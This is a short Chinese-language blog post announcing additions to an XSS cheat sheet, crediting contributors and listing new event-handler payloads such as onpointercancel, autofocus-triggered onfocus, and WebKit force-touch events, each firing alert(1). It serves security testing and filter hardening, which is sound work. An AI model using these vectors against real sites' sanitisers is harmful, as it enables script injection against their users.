onwebkitplaybacktargetavailabilitychanged?! XSS攻击手册中的新奇特事件

我们的XSS攻击手册的强大之处在于我们获得了来自Web安全社区的出色贡献，这次更新也不例外。我们获得了Mozilla的宝贵贡献，删除了在Firefox浏览器中不再适用于marquee标签的事件。

有一个非常晦涩的Safari专属向量，使用了来自@amirmsafari的onwebkitplaybacktargetavailabilitychanged事件，该事件适用于audio和video标签：

我们收到了来自@Wcraft-log的提交，提供了需要大量用户交互的onpointercancel事件：

1

<xss onpointercancel=alert(1)>XSS</xss>

@Filipnyquist指出我们没有记录现在几乎所有元素都可以使用autofocus属性。这一点早些时候由@RenwaX23和@lbherrera_发现。

1

<xss onfocus=alert(1) autofocus tabindex=1>

最后，我们收到了来自@zhenwarx的提交，显示我们遗漏了一系列需要与触控板用户交互的webkit事件：

1
2
3
4
5

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

注意：如果您想知道我们使用什么工具生成代码片段图像，我们使用优秀的在线工具Ray.so。